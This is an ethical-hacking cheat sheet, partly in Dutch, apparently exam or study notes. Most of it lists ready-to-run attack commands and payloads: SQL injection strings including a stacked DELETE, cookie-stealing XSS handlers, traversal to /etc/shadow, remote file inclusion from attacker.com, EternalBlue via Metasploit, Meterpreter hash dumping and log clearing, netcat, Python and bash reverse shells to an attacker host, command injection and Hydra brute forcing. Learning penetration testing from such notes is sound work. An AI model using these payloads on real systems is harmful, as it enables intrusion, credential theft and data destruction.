Ethical Hacking — Complete Cheat Sheet

🔍 NMAP Scan Types

nmap [options] <target>

SYN (Stealth)nmap -sS <target>

TCP Connectnmap -sT <target>

UDP Scannmap -sU -p 53,161 <target>

FIN Scannmap -sF <target>

Ping Sweepnmap -sn 192.168.1.0/24

OS Detectionnmap -O <target>

Version Detectnmap -sV <target>

All Scriptsnmap -sC <target>

Aggressivenmap -A <target>

All Portsnmap -p- <target>

Specific Portsnmap -p 22,80,443 <target>

Timing (-T)

T0 Paranoid T1 Sneaky T2 Polite T3 Normal T4 Aggressive T5 Insane

Port Response States

OpenSYN-ACK received

ClosedRST received

FilteredNo response / ICMP unreachable

📋 NMAP Enumeration Scripts (NSE)

SMB / Windows

nmap --script smb-enum-users.nse -p445 <host> nmap --script smb-enum-groups.nse -p445 <host> nmap --script smb-enum-shares.nse -p445 <host> nmap --script smb-enum-processes.nse \ --script-args smbusername=<u>,smbpass=<p> -p445 <host>

Web

nmap -sV --script=http-enum <target>

SNMP

nmap -sU -p161 --script=snmp-info <target> nmap -sU -p161 --script=snmp-brute <target>

SMTP Open Relay

nmap -p25 --script=smtp-open-relay <target>

Vuln Scan Combo

nmap -sV -sC -O -p- -T4 <target>

Other Enum Tools

enum4linuxenum4linux -a <target>

smbclientsmbclient -L //<target>

Nikto (web)nikto -h <target>

gobustergobuster dir -u <url> -w <wordlist>

ffufffuf -u <url>/FUZZ -w <wordlist>

🌐 DNS & Passive Recon

nslookupnslookup <domain>

dig anydig <domain> any

dig MXdig <domain> mx

dig reversedig -x <IP>

whoiswhois <domain>

DNSrecondnsrecon -d <domain>

theHarvestertheHarvester -d <domain> -b all

h8mailpip3 install h8mail → h8mail -t <email>

Recon-ng Key Commands

recon-ng marketplace search <keyword> marketplace install <module> modules load <module> options set SOURCE <domain> run

Google Dorks

filetypefiletype:xls "passwords"

inurlinurl:admin login

intitleintitle:"Index of /etc"

Sessions leakintext:JSESSIONID inurl:access.log

Shodanshodan search <query>

💉 SQL Injection

Basic Tests — put in any input field

' " ' OR '1'='1 ' OR '1'='1' -- ' OR '1'='1' /* admin'-- ' OR 1=1-- 1 OR 1=1 Smith' or '1'='1

UNION-Based

1 UNION SELECT null,null,null-- 1 UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data-- omar' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

Blind / Boolean

1 AND 1=1 → true (data shown) 1 AND 1=2 → false (blank/error) ' AND SUBSTRING(username,1,1)='a'--

Time-Delay (Blind)

MySQL: ' AND SLEEP(5)-- id=8 AND IF(version() like '8%',sleep(10),'false'))-- MSSQL: '; WAITFOR DELAY '0:0:5'-- Postgres: '; SELECT pg_sleep(5)--

Stacked Queries

1; DELETE FROM customers 1; INSERT INTO users(username) VALUES ('omar')

URL Injection

?id=99 AND 1=2 (false) ?id=99 AND 1=1 (true) ?id=1234' UNION SELECT 1,user_name,password,'1','1','1',1 FROM user_system_data --

DB Fingerprint (concat test)

MySQL'finger' + 'printing'

MSSQL'finger' 'printing'

Oracle/PG'finger'||'printing'

Basic Test

Img Tag

Event Handlers

<a onmouseover="alert(document.cookie)">click</a> <body onload=alert('xss')>

Types

Reflected (non-persist) Stored (persistent) DOM-based

🔐 Auth & Session Attacks

Session Fingerprint IDs

PHPPHPSESSID

Java/J2EEJSESSIONID

ASP.NETASP.NET_SessionId

ColdFusionCFID / CFTOKEN

Pass-the-Hash

Windows stores passwords as NTLM hashes in SAM
Use captured hash directly to auth (skip cracking)
Tools: Mimikatz, Metasploit

Password Tools

hashcat dicthashcat -m 0 hash.txt wordlist

john dictjohn --wordlist=rockyou.txt hash

john brutejohn --incremental hash

CSRF Attack Pattern

http://target/csrf/?password_new=NEWPASS &password_conf=NEWPASS&Change=Change#

📁 Path Traversal / File Inclusion

Directory Traversal

?page=../../../../../etc/passwd ?page=../../etc/shadow

URL Encoded Variants

../%2e%2e%2f

../%2e%2e/

../..%2f

..\%2e%2e%5c

LFI (Local File Inclusion)

?file=../etc/passwd ?lang=../../../../etc/passwd%00

RFI (Remote File Inclusion)

?page=http://attacker.com/malware.html

🎯 Metasploit Framework

msfconsole search <term> use exploit/windows/smb/ms17_010_eternalblue show options set RHOST <target-ip> set LHOST <your-ip> exploit (or run)

EternalBlue (MS17-010)

use exploit/windows/smb/ms17_010_eternalblue set RHOST <target> set LHOST <attacker> exploit

Meterpreter Commands

List procsps

Dump hasheshashdump

Shellshell

Upload fileupload /path/file

Download filedownload /path/file

Network infoipconfig

Who am Igetuid

Clear logsclearev

Migrate procmigrate <PID>

Webcam snapwebcam_snap

Search filessearch -f *.txt

Search Exploits CLI

searchsploit smb searchsploit <CVE-XXXX-XXXX>

🐚 Netcat & Shells

Bind Shell (victim listens)

# On VICTIM — open listener + shell nc -lvp 1234 -e /bin/bash # On ATTACKER — connect to victim nc -nv <victim-ip> 1234

Reverse Shell (attacker listens)

# On ATTACKER — open listener nc -lvp 666 # On VICTIM — connect back to attacker nc <attacker-ip> 666 -e /bin/bash

Other Netcat Uses

Port scannc -z <ip> 20-1000

Banner grabnc -nv <ip> 80

Send filenc -nv <ip> 1234 < file.txt

Recv filenc -lvp 1234 > out.txt

Python Reverse Shell

python3 -c 'import socket,subprocess,os; s=socket.socket(); s.connect(("ATTACKER",666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"])'

Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKER/666 0>&1

🌩 Network Attacks

LLMNR/NBT-NS Poisoning

Tool: Responder
Spoof name resolution on LAN
Capture NTLMv2 hashes
Crack offline → plain passwords

ARP Poisoning / MITM

Tool: Ettercap, ARPspoof
Spoof MAC → intercept L2 traffic
ARP cache = IP→MAC table poisoned

DNS Cache Poisoning

Inject bad DNS records
Victim → attacker's IP instead of real

SMTP Commands (user enum)

telnet <mailserver> 25 HELO test VRFY omar EXPN admins

SNMP Attack

Walksnmp-check <target>

Default credspublic / private

Brute NSE--script snmp-brute

FTP Anonymous

ftp <target> Username: anonymous Password: (blank or email)

DoS Types

Direct Reflected Amplification Botnet DDoS

🏴 Post-Exploitation & Persistence

Persistence Methods

Bind / Reverse shells
Scheduled tasks (Windows)
Custom daemons / services
Add new user accounts
Backdoors + rootkits
SSH tunnels / port forwarding

Lateral Movement

Network scanning post-exploit
SMB share enumeration
Pass-the-hash attacks
RDP / VNC access
Credential dumping → reuse

Cover Tracks

Delete created user accounts
Remove uploaded files & tools
Remove backdoors & daemons
Clear logs: clearev (meterp)
Restore modified configs

Steganography (steghide)

sudo apt install steghide # Hide data in image: steghide embed -cf image.png -sf secret.txt # Extract: steghide extract -sf image.png

Priv Escalation Types

Vertical (low→admin) Horizontal (user→user)

🔟 OWASP Top 10 & Misc Web Attacks

OWASP 2025 Categories

Injection Broken Auth SSRF Cryptographic Failures Insecure Design Security Misconfiguration Vulnerable Components Integrity Failures Logging Failures Broken Access Control

IDOR (Insecure Direct Object Ref)

?customerID=1188 → change to 1189 ?user=omar → change to admin

HTTP Parameter Pollution

?search=cars&results=20&search=bikes (same param twice with diff value)

HTTP Methods

GETPOST PUTDELETE OPTIONSTRACE

Command Injection

192.168.1.1; cat /etc/passwd 192.168.1.1 | whoami 192.168.1.1 && id

CSRF Attack URL

http://target/changepass? password_new=hack&password_conf=hack &Change=Change#

HTTP Status Ranges

1xxInformational

2xxSuccess

3xxRedirect

4xxClient Error

5xxServer Error

Web Proxy Tools

Burp Suite OWASP ZAP Wireshark

📐 Methodology & Pentest Phases

Pentest Phases (EC-Council)

1. Reconnaissance (passive/active)
2. Scanning & Enumeration
3. Gaining Access (exploitation)
4. Maintaining Access (persistence)
5. Covering Tracks
6. Reporting ← always!

Test Types

Black BoxNo prior knowledge

White BoxFull info (diagrams, creds)

Gray BoxLimited info (some creds)

CTFSpeed, get flags fast

Key Legal Documents

SOW (Statement of Work) NDA (Non-Disclosure) SLA (Service Level Agr.) Rules of Engagement Scope Definition

Vulnerability Scan Types

Unauthenticated Authenticated Discovery Full Stealth Compliance

Scoring Standards

CVECVE-YYYY-NNNN

CVSSScore 0–10 (base/temp/env)

CWEWeakness taxonomy

Metasploit= HIGH severity rule

🎭 Social Engineering

Attack Types

Phishing / Spear phishing
Whaling (targets execs)
Vishing (voice phishing)
SMS Phishing (smishing)
Watering hole attack
Malicious USB drops
Pharming (DNS redirect)

Physical

Tailgating (no consent)
Piggybacking (with consent)
Shoulder surfing
Dumpster diving
Badge cloning

Influence Methods

Authority Fear Urgency Likeness Scarcity Social Proof

Tools

SETsetoolkit → clone sites

BeEFXSS-based browser hook

⚡ Quick Reference

Kali One-liners

# Ping sweep nmap -sn 192.168.1.0/24 # All ports, version, default scripts nmap -sV -sC -p- <target> # Aggressive nmap -A -T4 <target> # Vuln scripts nmap --script vuln <target> # FTP anon check nmap --script ftp-anon <target> # SMB vuln check nmap --script smb-vuln* <target> # Nikto scan nikto -h http://<target> # Gobuster gobuster dir -u http://<target> \ -w /usr/share/wordlists/dirb/common.txt

SQLmap Quick

sqlmap -u "http://site.com/page?id=1" --dbs sqlmap -u "url" -D <db> --tables sqlmap -u "url" -D <db> -T <table> --dump

📝 Pentest Report Structure

Required Sections

Executive Summary
Scope Details
Methodology used
Findings (with CVSS scores)
Remediation guidance
Conclusion & Summary
Appendix + Glossary

Remediation Controls

Technical (MFA, patching) Administrative (policies) Operational (training) Physical (CCTV, mantraps)

Post-Engagement

Remove all test artifacts
Restore original configs
Delete test credentials
Client sign-off / acceptance
Destroy client sensitive data

🚫 Nikto Niet Beschikbaar? Doe Het Handmatig

1. Directory Enumeration

gobuster dir -u http://<target> \ -w /usr/share/wordlists/dirb/common.txt ffuf -u http://<target>/FUZZ \ -w /usr/share/wordlists/dirb/common.txt

2. Versie & Headers Detectie

nmap -sV -p 80,443 <target> nmap -sV --script=http-headers <target> # Server header pakken: curl -I http://<target> # Verbose headers: curl -v http://<target>

3. HTTP Methodes Checken

nmap --script http-methods <target> curl -X OPTIONS http://<target> -v

4. Bekende Paden Handmatig

curl http://<target>/admin curl http://<target>/backup curl http://<target>/config.php curl http://<target>/.htaccess

⭐ Altijd Als Eerste!

curl http://<target>/robots.txt curl http://<target>/sitemap.xml

robots.txt verbergt vaak juist de gevoelige mappen die ze niet willen tonen — perfect voor recon!

Combo = Nikto Vervanger

nmap -sV gobuster curl -I robots.txt http-methods

💀 John The Ripper (Linux Cracking)

1. Combineer Passwd & Shadow

Nodig om gebruikersinfo en hashes samen te voegen:

unshadow <passwd> <shadow> > combined.txt

2. Crack met John (RockYou)

john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

3. Bekijk Gekraakte Wachtwoorden

john --show combined.txt

Extra Formaten & Tips

Windows NTLMjohn --format=NT hash.txt

MD5 cryptjohn --format=md5crypt hash.txt

Unzip Rockyousudo gunzip /usr/share/wordlists/rockyou.txt.gz

🐳 Docker & Pivoting

Container IP Achterhalen

Cruciaal voor netwerk reconnaissance:

docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_id>

SSH & Tunneling

Priv Key Authssh -i <key> user@ip

Port Forwardssh -L <lport>:<rip>:<rport>

Shell in containerdocker exec -it <id> /bin/bash

🦈 Wireshark Analysis

Filters voor Credentials

HTTP POSThttp.request.method == POST

FTP User/Passftp

Telnet Plaintexttelnet

Volg Sessietcp.stream eq 0

Credentials Vinden

Follow TCP Stream → Zoek naar USER/PASS of Form Data

Bestanden Export

File → Export Objects → HTTP/FTP

💉 SQL Injection Pro Tips

Manual Enumeration

' ORDER BY 1-- (Tellen van kolommen) ' UNION SELECT NULL,NULL-- (Kolommen matchen)

DB Versies

MySQL/MSSQL@@version

OracleSELECT banner FROM v$version

Hydra Brute Force

hydra -l admin -P rockyou.txt ftp://<IP> hydra -l admin -P rockyou.txt ssh://<IP>